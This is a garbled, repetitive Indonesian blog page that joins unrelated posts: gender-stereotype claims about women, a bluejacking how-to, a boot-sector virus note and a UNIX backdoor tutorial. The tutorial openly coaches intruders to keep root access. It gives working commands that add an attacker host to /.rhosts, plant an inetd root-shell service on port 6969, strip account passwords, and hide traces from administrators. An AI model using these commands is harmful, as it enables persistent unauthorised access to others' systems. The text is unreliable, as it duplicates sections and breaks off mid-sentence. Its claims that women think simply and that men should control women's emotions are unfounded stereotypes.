4. Walaupun anda mempunyai banyak hal yang menyebalkan. Tapi tetap tidak akan ketahuan oleh wanita yang jatuh cinta (karena baginya anda adalah segalanya). Beda ceritanya jika sudah lebih dari 6 bulan menikah....segala sifat menyebalkan seorang pria akan terungkap dengan sendirinya.
5. Hal alami yang disukai wanita adalah pujian. Tapi sayangnya mereka tidak tahu bagaimana menggapi pujian itu dengan kata lain selalu salah tingkah.
6. Hati-hatilah anda jika wanita berkata dia sedang sedih tapi tidak tampak setetes air matapun yang menghiasi wajahnya. Artinya dia menangis dalam hati dan itu sangat menyakitkan.
7. Seoarang wanita yang cintanya bertepuk sebelah tangan, dia akan tahu diri dan mencoba untuk menghindar dari anda. Tapi tidak perasaannya yang selalu ingin dekat dengan anda.
8. Cinta adalah luapan emosi yang tidak bisa dikendalikan dan dibendung. Walaupun si Wanita berada di sisi pria lain, dia akan tetap memikirkan romeo yang dia cintai.]
9. Wanita itu sangat sulit untuk jatuh cinta, namun sekali jatuh cinta dia akan sangat sulit untuk melupakannya.
10. Anda tahu mengapa wanita suka hal-hal seperti musik, puisi, novel, drama cinta dsb. Itu karena hal semacam itu dapat mencurahkan isi hati mereka yang terdalam.
Naluri wanita
Jika kita dapat mengetahui naluri wanita. Karena ini langkah pertama untuk menguasai emosi wanita. Mengapa harus menguasai emosi wanita?
Menurut Ronald Rank: Jika seorang lelaki dapat menguasai bahkan mengendalikan emosi wanita. Maka wanita itu akan melakukan apa saja untuk lelaki tersebut.
i. Pernahkah anda ketakutan karena tiba-tiba ada orang lain yang berteriak ketakutan.
ii.Pernahkah anda tertawa melihat lawakan lucu di televisi.
Nah hal semacam diatas yang dimaksud.
Itulah mengapa wanita sulit mejelaskan mengapa dia jatuh cinta. Karea itu adalah hal reflek. Ini juga berlaku lho untuk laki-laki.
Walau begitu naluri wanita dan laki-laki itu berbeda-beda.
Naluri wanita adalah hal yang bersifat feminim yang menggoda katakanlah ingin menyayangi dan disayangi, berlindung, terlihat cantik dan sexy, dan suka berlindung. Ini berbeda dengan naluri laki-laki yang lebih bersifat maskulin semacam : Dominan, kasar, memaksa, melindungi, dan ingin terkenal.
Cobalah anda lihat orang mabuk, jika laki-laki dia akan terlihat mau menang sendiri, menantang orang lain dan meremehkan orang lain. Sedangkan bagi wanita ia akan terlihat menggoda orang lain. Ini karena orang mabuk telah kehilangan akal sehat dan digantikan dengan naluri mereka
Contoh lainnya tentang naluri wanita adalah seperti ini. Berikanlah anak perempuan anda mainan berupa mobil-mobilan. Apa yang dilakukan anak perempuan anda? Dia tidak akan memainkan mobil-mobilan itu selayaknya andak laki-laki. Bahkan cenderung dia akan memperlakukan mobil-mobilan itu seperti anaknya. Dia akan menggendongnya dan menjadi ibu bagi mobil-mobilan itu.
Wanita cenderung mengunakan Logika sederhana dan Simpel
Inilah wanita, selalu merasakan & menikmati apa saja yangg sudah sewajarnya untuk dinikmati. Mereka merasa menikmati sesuatu yg memang menurutnya pantas untuk dinikmati. Menikmati hidup yangg seakan berjalan begitu saja. Menikmatinya dengan penuh rasa, sesuai perasaan yang memang sedang mendasarinya. Menikmati dan mengungkapkan apa saja sesuai yang ada dalam hati dan perasaannya.
Merekalah mahkluk yg simpel dan tidak suka bertele-tele. Mahkluk yang menggunakan logika yg sederhana-sederhana saja. Sebuah logika yang sering digunakan dalam ilmu matematika. Sebuah logika bahwa 1+1 adalah 2. Padahal dalam ilmu-ilmu sosial penjumlahan itu jelas-jelas bisa menjadi berbeda. Apalagi menyangkut prilaku, perwatakan at pun kemungkinan-kemungkinan sosial, tidaklah akan selalu menghasilkan nilai angka dua. Inilah logika yang digunakan mereka, sebuah logika sederhana yg tak mau tahu adanya kemungkinan-kemungkinan yang berbeda.
Itulah sebabnya wanita sering dianggap selalu berbuat kesalahan demi kesalahan oleh kaum lelaki. Namun anehnya kesalahan itu tdk disadarinya. At malah bisa jadi terjadi atas penilaian & pandangan yangg sudah dianggapnya benar adanya. Sehingga inilah yg sering menjadikan kaum lelaki kelimpungan dan salah paham. Salah paham karena tidak mengerti siapakah yang sedang dihadapinya. Salah paham oleh sebab mereka di anggap sama dengan dirinya. Maka menjadi sangat wajar jika semua menjadi pertentangan diantara mereka. Pertentangan-pertentangan akibat kesalahpahaman dan ketidaktahuan saja.
Wednesday, July 21, 2010
BLUEJACKING
BLUEJACKING
Sebelum saya berbicara lebih jauh tentang bluejacking, kita harus mengatahui dulu, apa itu bluetooth. Saat ini banyak peralatan yang dilengkapi fasilitas bluetooth, dimana fasilitas ini memungkinkan sebuah perangkat (ponsel, PDA, printer, kamera digital, komputer, handsfree, mouse, keyboard, modem dll.) dapat saling berhubungan dengan perangkat bluetooth lainnya tanpa menggunakan kabel yang secara teori dapat bekerja dalam jarak ± 10 meter.
Dalam sebuah ponsel atau PDA, fungsi bluetooth biasanya digunakan untuk berkirim nomor telepon, gambar, daftar kegiatan atau kalender, agar dapat saling bertukar data dengan perangkat bluetooth lainnya, kedua perangkat tersebut harus melakukan pairing terlebih dahulu, pairing adalah sebuah proses dimana ada salah satu perangkat yang bertindak sebagai 'pencari'(discover) dan perangkat lainnya yang menjadi 'yang dicari' (discoverable). Setelah melakukan pairing tersebut barulah kedua perangkat tadi dapat saling bertukar data.
Pada tindakan bluejacking untuk mengirimkan data kita tidak melalui tahap pairing sehingga korbannya tidak mengetahui bahwa ponselnya sedang disusupi oleh seseorang (pelaku bluejacking biasanya disebut bluejacker sedangkan korbannya disebut victim), seorang bluejacker dapat mengirimkan pesan atau gambar kepada perangkat korban secara tiba-tiba, sehingga pesan atau gambar nyelonong ke perangkat korban tanpa permisi, biasanya korban bluejacking kaget atau bahkan resah jika isi pesan atau gambar yang diterimanya bersifat teror.
Namun sejauh ini secara teknis tindakan bluejacking tidak terlalu berbahaya baik terhadap perangkat maupun program aplikasi yang terdapat dalam ponsel atau PDA, hanya saja si korban akan merasa terganggu dengan datangnya pesan secara tiba-tiba, si penerima pesan biasanya tidak dapat melacak dari mana pesan itu datang, sebab dalam hal ini perangkat bluetooth sama sekali tidak mengakses simcard hanya menggunakan gelombang pendek yang dimiliki oleh perangkat bluetooth, sehingga nomor si pengirim tidak dapat diketahui. Adapun ponsel yang rentan terhadap tindakan bluejacking ini adalah Sony Ericsson's T68, R520m, T68i, T610, Z1010, Z600 dan Nokia's 6310, 6310i, 3650, 7650, 8910 dan 8910i.
Bagaimana melakukan Bluejacking?
Untuk dapat melakukan bluejacking kita tidak membutuhkan pengetahuan dan kemampuan sekelas programer atau hacker, yang kita butuhkan hanyalah sebuah perangkat yang memiliki fasilitas bluetooth. Berikut ini adalah langkah-langkah yang dapat kita lakukan untuk melakukan bluejacking;
1. Bawalah perangkat bluetooth yang ada (Ponsel, PDA, PocketPC), dalam hal ini saya mengasumsikan bahwa kita menggunakan ponsel.
2. Buatlah daftar kontak baru pada phonebook dengan diisi pesan yang akan kita kirim pada seseorang, misalnya pada kolom First Name diisi kalimat "Selamat Datang di" sedangkan pada kolom Last Name diisi kalimat "Dunia Digital", simpanlah pesan tersebut sebagai daftar kontak yang baru. Jika mau kita bisa membuat kalimat lain sebanyak mungkin.
3. Pergilah ketempat ramai, atau tempat yang memungkinkan banyak orang membawa ponsel seperti Mall, Lobby, Restoran, Toko Ponsel dll.
4. Bukalah daftar kontak yang berisi pesan yang telah kita buat tadi, lalu pilih menu "Send Via Bluetooth"
5. Sesaat ponsel akan mencari perangkat bluetooth lain yang ada disekitar kita, jika tidak menemukan perangkat lain, pindahlah ketempat yang lebih ramai.
6. Jika ponsel menemukan perangakt bluetooth lain, maka akan muncul di layar ponsel kita, biasanya nama perangkat lain akan muncul sebagai merek ponsel yang bersangkutan tapi ada juga yang sudah dirubah oleh pemiliknya sebagai nama lain.
7. Jika perangkat yang ditemukan lebih dari satu, pilihlah salah satunya.
8. Jika berhasil maka daftar kontak yang berisi kalimat tadi akan terkirim pada perangkat tersebut.
9. Jika memungkinkan, lihatlah orang lain disekitar kita yang membawa perangkat bluetooth, kita juga harus dapat membedakan ponsel mana yang memiliki fasilitas bluetooth dan yang tidak.
10. Selanjutnya, terserah kita.
Sebenarnya ada tindakan penyusupan lain yang lebih mengerikan adalah apa yang disebut dengan bluesnarfing atau sering juga disebut dengan snarf attack, dengan metode yang hampir sama dengan bluejacking pelaku snarf attack dapat mengcopy semua data yang ada didalam ponsel korban seperti daftar kontak, kalender dan pesan yang ada dalam ponsel korban. Untuk melakukan bluesnarfing diperlukan laptop/PC yang didalamnya sudah terinstal aplikasi bluesnarfing namun sampai tulisan ini diturunkan belum ada satu pihakpun yang menyediakan aplikasi ini, baik di Internet maupun di pasaran selain aplikasi yang dimiliki salah satu peserta pameran CeBIT2004 di Hannover Jerman pada waktu lalu, mereka menggunakan aplikasi Bluez yang didalamnya terdiri dari aplikasi bluez-libs-2-.5,bluez-utils-2.4 and bluez-sdp-1.5 program tersebut dibuat dalam bahasa C dan PERL yang berjalan dibawah kernel Linux versi 2-6-2., lalu diinstalkan pada laptop COMPAQ Evo N600c ditambah dua buah peralatan bluetooth dongle-USB yang terpasang pada laptop tersebut.
Sampai saat ini kita memang belum pernah mendengar korban dari tindakan Bluesnarfing ini, namun tindakan percobaan yang pernah dilakukan oleh perusahaan yang bernama Salzburg Research Forschungsgesellschaft mbH dari Austria yang menempati stand hall 11 pada pameran CeBIT 2004 di Jerman sempat menghebohkan para pengunjung pameran tersebut karena hasilnya sungguh mengejutkan bahwa ponsel dan PDA yang selama ini mereka gunakan untuk menyimpan data penting dan rahasia dapat diakses dengan mudah oleh orang lain.
Pencegahan dari Tindakan Bluejacking dan Bluesnarfing:
Untuk mencegah agar perangkat bluetooth yang kita miliki agar tidak terkena tindakan bluejacking/bluesnarffing sebenarnya sangatlah sederhana, kuncinya adalah matikanlah fasilitas bluetooth yang ada pada ponsel kita jika berada ditempat umum atau jika memang fasilitas ini tidak digunakan. Tindakan lain yang lebih aman adalah dengan cara meng-upgrade firmware yang ada dalam ponsel kita dengan versi yang lebih baru.
Sebenarnya tindakan bluejacking ini dapat juga digunakan untuk hal-hal yang lebih positif, walaupun memang sedikit bersifat spamming, misalnya penawaran diskon suatu barang ketika seseorang yang memiliki perangkat bluetooth sedang melihat-lihat didepan toko yang menjual barang diskon tersebut, atau ucapan "selamat datang" ketika seseorang masuk kewilayah tertentu, misalnya.[Q]
Bluesnarfing
Snarf attack memungkinkan kita terhubung dengan ponsel Bluetooth tanpa ada peringatan kepada pemiliknya bahwa bahwa ponsel mereka sedang diintip oleh orang lain. Dengan metode ini, para hacker dapat mengakses data-data ponsel, termasuk di dalamnya phonebook, image, calendar, realtime clock, bussines card, properties bahkan nomor IMEI. Normalnya, hat ini mungkin dilakukan jika ponsel target dalam mode ‘discoverable’ atau ‘visible’, akan tetapi dengan aplikasi semacam
Boot Sector Viruses
Virus Boot sector ini sudah umum sekali menyebar (terus terang hardiskku sering diformat gara gara virus ini. Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan di load kememori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar keseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain selain c:\)
contoh virus ::
- varian virus wyx (langganan gwa nih :) ex: wyx.C(B) menginfeksi boot record dan floopy ; panjang :520 bytes; karakteristik : memory resident dan terenkripsi)
- varian V-sign : menginfeksi : Master boot record ; panjang 520 bytes; karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
- Stoned.june 4th/ bloody!: menginfeksi : Master boot record dan floopy; panjang 520 bytes; karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali.
Sebelum saya berbicara lebih jauh tentang bluejacking, kita harus mengatahui dulu, apa itu bluetooth. Saat ini banyak peralatan yang dilengkapi fasilitas bluetooth, dimana fasilitas ini memungkinkan sebuah perangkat (ponsel, PDA, printer, kamera digital, komputer, handsfree, mouse, keyboard, modem dll.) dapat saling berhubungan dengan perangkat bluetooth lainnya tanpa menggunakan kabel yang secara teori dapat bekerja dalam jarak ± 10 meter.
Dalam sebuah ponsel atau PDA, fungsi bluetooth biasanya digunakan untuk berkirim nomor telepon, gambar, daftar kegiatan atau kalender, agar dapat saling bertukar data dengan perangkat bluetooth lainnya, kedua perangkat tersebut harus melakukan pairing terlebih dahulu, pairing adalah sebuah proses dimana ada salah satu perangkat yang bertindak sebagai 'pencari'(discover) dan perangkat lainnya yang menjadi 'yang dicari' (discoverable). Setelah melakukan pairing tersebut barulah kedua perangkat tadi dapat saling bertukar data.
Pada tindakan bluejacking untuk mengirimkan data kita tidak melalui tahap pairing sehingga korbannya tidak mengetahui bahwa ponselnya sedang disusupi oleh seseorang (pelaku bluejacking biasanya disebut bluejacker sedangkan korbannya disebut victim), seorang bluejacker dapat mengirimkan pesan atau gambar kepada perangkat korban secara tiba-tiba, sehingga pesan atau gambar nyelonong ke perangkat korban tanpa permisi, biasanya korban bluejacking kaget atau bahkan resah jika isi pesan atau gambar yang diterimanya bersifat teror.
Namun sejauh ini secara teknis tindakan bluejacking tidak terlalu berbahaya baik terhadap perangkat maupun program aplikasi yang terdapat dalam ponsel atau PDA, hanya saja si korban akan merasa terganggu dengan datangnya pesan secara tiba-tiba, si penerima pesan biasanya tidak dapat melacak dari mana pesan itu datang, sebab dalam hal ini perangkat bluetooth sama sekali tidak mengakses simcard hanya menggunakan gelombang pendek yang dimiliki oleh perangkat bluetooth, sehingga nomor si pengirim tidak dapat diketahui. Adapun ponsel yang rentan terhadap tindakan bluejacking ini adalah Sony Ericsson's T68, R520m, T68i, T610, Z1010, Z600 dan Nokia's 6310, 6310i, 3650, 7650, 8910 dan 8910i.
Bagaimana melakukan Bluejacking?
Untuk dapat melakukan bluejacking kita tidak membutuhkan pengetahuan dan kemampuan sekelas programer atau hacker, yang kita butuhkan hanyalah sebuah perangkat yang memiliki fasilitas bluetooth. Berikut ini adalah langkah-langkah yang dapat kita lakukan untuk melakukan bluejacking;
1. Bawalah perangkat bluetooth yang ada (Ponsel, PDA, PocketPC), dalam hal ini saya mengasumsikan bahwa kita menggunakan ponsel.
2. Buatlah daftar kontak baru pada phonebook dengan diisi pesan yang akan kita kirim pada seseorang, misalnya pada kolom First Name diisi kalimat "Selamat Datang di" sedangkan pada kolom Last Name diisi kalimat "Dunia Digital", simpanlah pesan tersebut sebagai daftar kontak yang baru. Jika mau kita bisa membuat kalimat lain sebanyak mungkin.
3. Pergilah ketempat ramai, atau tempat yang memungkinkan banyak orang membawa ponsel seperti Mall, Lobby, Restoran, Toko Ponsel dll.
4. Bukalah daftar kontak yang berisi pesan yang telah kita buat tadi, lalu pilih menu "Send Via Bluetooth"
5. Sesaat ponsel akan mencari perangkat bluetooth lain yang ada disekitar kita, jika tidak menemukan perangkat lain, pindahlah ketempat yang lebih ramai.
6. Jika ponsel menemukan perangakt bluetooth lain, maka akan muncul di layar ponsel kita, biasanya nama perangkat lain akan muncul sebagai merek ponsel yang bersangkutan tapi ada juga yang sudah dirubah oleh pemiliknya sebagai nama lain.
7. Jika perangkat yang ditemukan lebih dari satu, pilihlah salah satunya.
8. Jika berhasil maka daftar kontak yang berisi kalimat tadi akan terkirim pada perangkat tersebut.
9. Jika memungkinkan, lihatlah orang lain disekitar kita yang membawa perangkat bluetooth, kita juga harus dapat membedakan ponsel mana yang memiliki fasilitas bluetooth dan yang tidak.
10. Selanjutnya, terserah kita.
Sebenarnya ada tindakan penyusupan lain yang lebih mengerikan adalah apa yang disebut dengan bluesnarfing atau sering juga disebut dengan snarf attack, dengan metode yang hampir sama dengan bluejacking pelaku snarf attack dapat mengcopy semua data yang ada didalam ponsel korban seperti daftar kontak, kalender dan pesan yang ada dalam ponsel korban. Untuk melakukan bluesnarfing diperlukan laptop/PC yang didalamnya sudah terinstal aplikasi bluesnarfing namun sampai tulisan ini diturunkan belum ada satu pihakpun yang menyediakan aplikasi ini, baik di Internet maupun di pasaran selain aplikasi yang dimiliki salah satu peserta pameran CeBIT2004 di Hannover Jerman pada waktu lalu, mereka menggunakan aplikasi Bluez yang didalamnya terdiri dari aplikasi bluez-libs-2-.5,bluez-utils-2.4 and bluez-sdp-1.5 program tersebut dibuat dalam bahasa C dan PERL yang berjalan dibawah kernel Linux versi 2-6-2., lalu diinstalkan pada laptop COMPAQ Evo N600c ditambah dua buah peralatan bluetooth dongle-USB yang terpasang pada laptop tersebut.
Sampai saat ini kita memang belum pernah mendengar korban dari tindakan Bluesnarfing ini, namun tindakan percobaan yang pernah dilakukan oleh perusahaan yang bernama Salzburg Research Forschungsgesellschaft mbH dari Austria yang menempati stand hall 11 pada pameran CeBIT 2004 di Jerman sempat menghebohkan para pengunjung pameran tersebut karena hasilnya sungguh mengejutkan bahwa ponsel dan PDA yang selama ini mereka gunakan untuk menyimpan data penting dan rahasia dapat diakses dengan mudah oleh orang lain.
Pencegahan dari Tindakan Bluejacking dan Bluesnarfing:
Untuk mencegah agar perangkat bluetooth yang kita miliki agar tidak terkena tindakan bluejacking/bluesnarffing sebenarnya sangatlah sederhana, kuncinya adalah matikanlah fasilitas bluetooth yang ada pada ponsel kita jika berada ditempat umum atau jika memang fasilitas ini tidak digunakan. Tindakan lain yang lebih aman adalah dengan cara meng-upgrade firmware yang ada dalam ponsel kita dengan versi yang lebih baru.
Sebenarnya tindakan bluejacking ini dapat juga digunakan untuk hal-hal yang lebih positif, walaupun memang sedikit bersifat spamming, misalnya penawaran diskon suatu barang ketika seseorang yang memiliki perangkat bluetooth sedang melihat-lihat didepan toko yang menjual barang diskon tersebut, atau ucapan "selamat datang" ketika seseorang masuk kewilayah tertentu, misalnya.[Q]
Bluesnarfing
Snarf attack memungkinkan kita terhubung dengan ponsel Bluetooth tanpa ada peringatan kepada pemiliknya bahwa bahwa ponsel mereka sedang diintip oleh orang lain. Dengan metode ini, para hacker dapat mengakses data-data ponsel, termasuk di dalamnya phonebook, image, calendar, realtime clock, bussines card, properties bahkan nomor IMEI. Normalnya, hat ini mungkin dilakukan jika ponsel target dalam mode ‘discoverable’ atau ‘visible’, akan tetapi dengan aplikasi semacam
Boot Sector Viruses
Virus Boot sector ini sudah umum sekali menyebar (terus terang hardiskku sering diformat gara gara virus ini. Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan di load kememori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar keseluruh drive yang ada dan terhubung kekomputer (ex: floopy, drive lain selain c:\)
contoh virus ::
- varian virus wyx (langganan gwa nih :) ex: wyx.C(B) menginfeksi boot record dan floopy ; panjang :520 bytes; karakteristik : memory resident dan terenkripsi)
- varian V-sign : menginfeksi : Master boot record ; panjang 520 bytes; karakteristik: menetap di memori (memory resident),terenkripsi, dan polymorphic)
- Stoned.june 4th/ bloody!: menginfeksi : Master boot record dan floopy; panjang 520 bytes; karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan pesan "Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali.
Adware Dan Backdoor Trojan
ADWARE
Adware adalah iklan yang dimasukan secara tersembunyi oleh pembuatprogram. Umumnya program diberikan secara gratis, tetapi dengan kompensasi pemakai harus menerima iklan pada program.
BACK DOOR TROJAN
Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem.
Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih jalan masuk 'alternatif'. Jelas, sebagian besar teknik-teknik backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.
Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak. Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan privilese root.
Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-router, printserver, dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah dengan melalui file /.rhosts:
korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts
perintah diatas akan menambah satu entri di file .rhosts (sistem luar-dalam contoh diatas user ganjaman dari indohack2.ri.go.id - yang bolehmengakses account tanpa password), dan untuk masuk kembali ke sistem dari account "ganjaman" di indohack2.ri.go.id :
ganjaman@indohack2> rlogin -l root korban.lameisp.net.id poof! shell root tanpa password!
Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari file /etc/passwd sebuah sistem:
bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false
tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi. Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak diantara crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet dengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya adalah file pertama yang akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya telah kena susup. Agar kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di home directory milik bin. Kembali ke entri file password diatas, bisa kita lihat bahwa walaupun kita bisa me- rlogin -l bin korban.lameisp.net.id, namun kita masih juga tidak bisa mendapatkan shell sebab account 'bin' dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masalah ini tentunya dengan membuat link dari /bin/false ke /bin/sh atau /bin/tcsh. Apa daya seorang sysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan mensetup sebuah skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah entri dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan merupakan nama file.
Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi metode ini benar-benar cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah lubang masuk lewat salah satu port yang didefinisikan dalam "inetd":
root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >> /etc/services root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >> /etc/inetd.conf root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r menjalankan tiga perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat, namun tidak akan segera tampak. Penjelasan dari ketiga perintah diatas:
1. Mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak begitu mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic Control Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan biasanya sysadmin tidak akan begitu curiga dengan nama seperti itu.
2. Memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem menerima koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese root lewat cara ini hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa memberikan perintah-perintah selayaknya kita login lewat jalur normal. Sang shell akan tetap dijalankan, namun tidak akan bisa mengeksekusi perintah kita. Untuk itulah kita buat satu skrip di direktori /tmp/crax0r (tentunya kamu lebih pintar dan memilih nama yang tidak begitu mencurigakan seperti /tmp/dev001).
3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan (id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untuk menghemat tempat, kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan entri dari mesin host kita ke file .rhosts milik root.
Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan untuk tidak mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik root dan isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas akan memberikan jalan masuk lewat belakang ke dalam sistem target. Sekarang kamu tinggal: ganjaman@indohack2> telnet korban.lameisp.net.id 6969
Sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di mesin korban akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r dengan privilese root, dan dengan segera menutup kembali sambungan telnet. Sekarang .rhosts milik root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali menggarap sistem target (sebaiknya dilakukan saat itu juga, sebab sang sysadmin mungkin akan curiga melihat skrip 'asing' dijalankan lewat port 6969) kamu tinggal: ganjaman@indohack2> rlogin -l root korban.lameisp.net.id dan, BOOM! korban#
Shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke indohack@hotmail.com, bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent... engin badannya ..." :) ). Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain. Tentunya kalau kung fu kamu emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau kamu benar-benar suka mengutak-utik, serangan bisa dibuat dengan lebih tersembunyi lagi, seperti dengan memanfaatkan service-service yang jarang (hampir tidak pernah dipakai) seperti utilitas-utilitas X, segala utilitas berkepala "r", dan banyak lagi.
Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem mempunyai program audit keamanan yang akan mensensus seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar (seperti /tmp atau lokasi homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi suatu program yang sudah berjalan / terinstal secara default, seperti xterm dan splitvt, sehingga sebuah option rootshell akan secara otomatis execv("/bin/sh", "sh", NULL);.
Adware adalah iklan yang dimasukan secara tersembunyi oleh pembuatprogram. Umumnya program diberikan secara gratis, tetapi dengan kompensasi pemakai harus menerima iklan pada program.
BACK DOOR TROJAN
Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem.
Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di keesokan harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih jalan masuk 'alternatif'. Jelas, sebagian besar teknik-teknik backdooring hanya bisa diterapkan jika kamu mempunyai perizinan root.
Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses root, tetapi untuk mendapatkan akses root LAGI setelah sang sysadmin menutup segala jalan masuk normal. Terkadang sysadmin sering menganggap selama file-file /etc/hosts.deny telah dikonfigurasi, maka segala koneksi dari host kamu akan ditolak. Tentu saja kalian-kalian, sang cracker, kelihaian kung fu nya jauh di atas sang sysadmin, sebab tanpa sepengetahuan beliau, telah kamu set up beberapa jalan masuk alternatif dengan privilese root.
Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-router, printserver, dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor kamu sendiri di sebuah sistem UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah dengan melalui file /.rhosts:
korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts
perintah diatas akan menambah satu entri di file .rhosts (sistem luar-dalam contoh diatas user ganjaman dari indohack2.ri.go.id - yang bolehmengakses account tanpa password), dan untuk masuk kembali ke sistem dari account "ganjaman" di indohack2.ri.go.id :
ganjaman@indohack2> rlogin -l root korban.lameisp.net.id poof! shell root tanpa password!
Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari file /etc/passwd sebuah sistem:
bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false
